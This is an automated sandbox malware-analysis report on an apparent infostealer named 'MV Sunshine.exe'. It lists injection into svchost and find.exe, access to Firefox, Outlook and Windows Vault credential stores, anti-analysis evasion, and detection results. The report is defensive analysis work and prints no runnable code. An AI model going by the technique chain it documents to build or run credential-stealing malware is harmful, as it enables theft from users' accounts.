Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0308D800	4_2_0308D800
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030238E0	4_2_030238E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DFF09	4_2_030DFF09
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03021F92	4_2_03021F92
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DFFB1	4_2_030DFFB1
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02FE3FD5	4_2_02FE3FD5
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02FE3FD2	4_2_02FE3FD2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03029EB0	4_2_03029EB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03023D40	4_2_03023D40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D1D5A	4_2_030D1D5A
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D7D73	4_2_030D7D73
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0303FDC0	4_2_0303FDC0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03099C32	4_2_03099C32
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DFCF2	4_2_030DFCF2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02851E10	4_2_02851E10
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0284AFF0	4_2_0284AFF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0284CF70	4_2_0284CF70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0284CD50	4_2_0284CD50
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02853690	4_2_02853690
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02855440	4_2_02855440
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0286B940	4_2_0286B940
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E7E268	4_2_02E7E268
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E7E383	4_2_02E7E383
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E8532C	4_2_02E8532C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E7D7E8	4_2_02E7D7E8
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E7E723	4_2_02E7E723
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E7CA88	4_2_02E7CA88
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02E7E8AC	4_2_02E7E8AC

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 03055130 appears 58 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 0309F290 appears 105 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 0308EA12 appears 86 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 03067E54 appears 111 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 0300B970 appears 280 times
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: String function: 00627F41 appears 35 times
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: String function: 00648B40 appears 42 times
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: String function: 00640D27 appears 70 times

Source: MV Sunshine.exe, 00000000.00000003.2117565333.0000000003D0D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MV Sunshine.exe
Source: MV Sunshine.exe, 00000000.00000003.2117816421.0000000003B63000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MV Sunshine.exe

Source: MV Sunshine.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/5@14/11

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0068A2D5 GetLastError,FormatMessageW,

0_2_0068A2D5

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00678713 AdjustTokenPrivileges,CloseHandle,		0_2_00678713
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00678CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00678CC3

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0068B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0068B59E

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0069F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0069F121

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0068C602 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0068C602

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00624FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00624FE9

Source: C:\Users\user\Desktop\MV Sunshine.exe

File created: C:\Users\user\AppData\Local\Temp\autC552.tmp

Jump to behavior

Source: MV Sunshine.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: find.exe, 00000004.00000003.2477910980.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2480298592.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.3964890835.0000000002AB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.3964890835.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2478016313.0000000002AB3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: MV Sunshine.exe	ReversingLabs: Detection: 28%
Source: MV Sunshine.exe	Virustotal: Detection: 23%

Source: unknown	Process created: C:\Users\user\Desktop\MV Sunshine.exe "C:\Users\user\Desktop\MV Sunshine.exe"
Source: C:\Users\user\Desktop\MV Sunshine.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine.exe"
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\MV Sunshine.exe	Process created: C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding
Source: C:\Users\user\Desktop\MV Sunshine.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine.exe"	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: usermgrcli.dll	Jump to behavior

Source: C:\Windows\SysWOW64\find.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\find.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: MV Sunshine.exe

Static file information: File size 1458176 > 1048576

Source: MV Sunshine.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MV Sunshine.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MV Sunshine.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MV Sunshine.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MV Sunshine.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MV Sunshine.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: MV Sunshine.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: find.pdb source: svchost.exe, 00000002.00000002.2298577074.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298556423.0000000003200000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965368113.0000000000C58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oVmFMrJhUAa.exe, 00000003.00000000.2219802940.00000000006FE000.00000002.00000001.01000000.00000004.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3964401798.00000000006FE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: MV Sunshine.exe, 00000000.00000003.2117928427.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine.exe, 00000000.00000003.2116316575.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2205655120.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204017242.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.000000000399E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.3966524421.000000000317E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2302636573.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2298597347.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.3966524421.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MV Sunshine.exe, 00000000.00000003.2117928427.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine.exe, 00000000.00000003.2116316575.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2205655120.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204017242.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298818432.000000000399E000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.3966524421.000000000317E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2302636573.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2298597347.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.3966524421.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: find.pdbGCTL source: svchost.exe, 00000002.00000002.2298577074.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2298556423.0000000003200000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965368113.0000000000C58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: find.exe, 00000004.00000002.3967280480.000000000360C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.3964890835.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000000.2367418538.0000000002D6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2586131537.0000000013B0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: find.exe, 00000004.00000002.3967280480.000000000360C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.3964890835.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000000.2367418538.0000000002D6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2586131537.0000000013B0C000.00000004.80000000.00040000.00000000.sdmp

Source: MV Sunshine.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MV Sunshine.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MV Sunshine.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MV Sunshine.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MV Sunshine.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0069C304 LoadLibraryA,GetProcAddress,

0_2_0069C304

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0062C590 push eax; retn 0062h	0_2_0062C599
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00648B85 push ecx; ret	0_2_00648B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004149F5 push es; ret	2_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401865 push ecx; ret	2_2_0040186F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401870 push ecx; ret	2_2_00401891
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414969 push es; ret	2_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004149D1 push es; ret	2_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040333C push ss; ret	2_2_0040334A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004034C0 push eax; ret	2_2_004034C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D4D4 push ebx; retf	2_2_0040D4D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414CE0 push edi; retf	2_2_00414D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D49F push esp; iretd	2_2_0040D4AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401546 push ecx; ret	2_2_00401548
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041466D push ss; iretd	2_2_0041466E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167C7 push esi; retf	2_2_004167CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx	2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd	2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd	2_2_03801369
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AFE36F push esi; retf	3_2_02AFE376
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AFC888 push edi; retf	3_2_02AFC8B1
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AF507C push ebx; retf	3_2_02AF5080
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AF5047 push esp; iretd	3_2_02AF5052
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AFF6F3 push eax; ret	3_2_02AFF6F5
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02B067CE push eax; iretd	3_2_02B067CF
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02FE225F pushad ; ret	4_2_02FE27F9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02FE27FA pushad ; ret	4_2_02FE27F9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030109AD push ecx; mov dword ptr [esp], ecx	4_2_030109B6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02FE283D push eax; iretd	4_2_02FE2858
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02FE1368 push eax; iretd	4_2_02FE1369

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00624A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00624A35
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006A55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_006A55FD

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_006433C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006433C7

Source: C:\Users\user\Desktop\MV Sunshine.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\MV Sunshine.exe	API/Special instruction interceptor: Address: F63CA4
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\find.exe	Window / User API: threadDelayed 359			Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Window / User API: threadDelayed 9613			Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine.exe	API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\find.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\find.exe TID: 6508	Thread sleep count: 359 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe TID: 6508	Thread sleep time: -718000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe TID: 6508	Thread sleep count: 9613 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe TID: 6508	Thread sleep time: -19226000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe TID: 6520	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe TID: 6520	Thread sleep time: -42000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\find.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\find.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00684696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00684696
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068C93C FindFirstFileW,FindClose,	0_2_0068C93C
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0068C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0068C9C7
